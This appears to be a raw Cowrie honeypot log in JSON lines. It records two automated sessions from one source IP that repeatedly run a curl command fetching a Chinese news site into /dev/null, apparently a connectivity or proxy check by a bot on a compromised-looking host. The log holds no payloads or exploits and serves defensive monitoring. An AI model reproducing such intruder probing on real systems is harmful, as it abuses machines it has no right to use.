{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.486101Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.488308Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.519836Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.521043Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.526745Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.527774Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.532763Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.561512Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.564078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.566435Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.567622Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.635058Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.636646Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.689706Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.690804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.693727Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.695256Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.696223Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.713260Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.715223Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.786117Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.787946Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.851078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.852204Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.856807Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.857733Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.893188Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.894967Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.932575Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.939323Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.940720Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.976446Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.977925Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.982938Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.984506Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.987248Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.988752Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.002074Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.014016Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.029924Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.045940Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.047286Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.050724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.051831Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.054780Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.083053Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.084241Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.088735Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.089646Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.120121Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.121238Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.127424Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.128405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.159413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.160550Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.172146Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.173210Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.200507Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.201694Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.215019Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.216226Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.221400Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.222364Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.260270Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.261874Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.267762Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.268738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.287949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.289125Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.302442Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.305750Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.309487Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.343043Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.344456Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.382358Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.383972Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.424314Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.425833Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.427314Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.443834Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.446857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.478341Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.479497Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.489546Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.490645Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.493467Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.515345Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.516730Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.528172Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.529403Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.550794Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.551945Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.568058Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.569126Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.591547Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.592701Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.610420Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.611515Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.630412Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.631463Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.649441Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.650589Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.666771Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.667741Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.709383Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.710488Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.718078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.719134Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.835099Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.836388Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.841033Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.842013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.853611Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.855553Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.897137Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.898378Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:47.901627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.902587Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:47.948129Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
